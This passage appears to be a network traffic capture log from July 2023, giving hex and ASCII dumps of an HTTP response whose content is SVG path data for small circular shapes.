                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7687INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7703INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7719INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7735INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7751INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                          Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7767INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7783INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                          Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7799INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7815INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7831INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8564INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8580INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8596INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8612INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8628INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8644INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                          Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8660INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
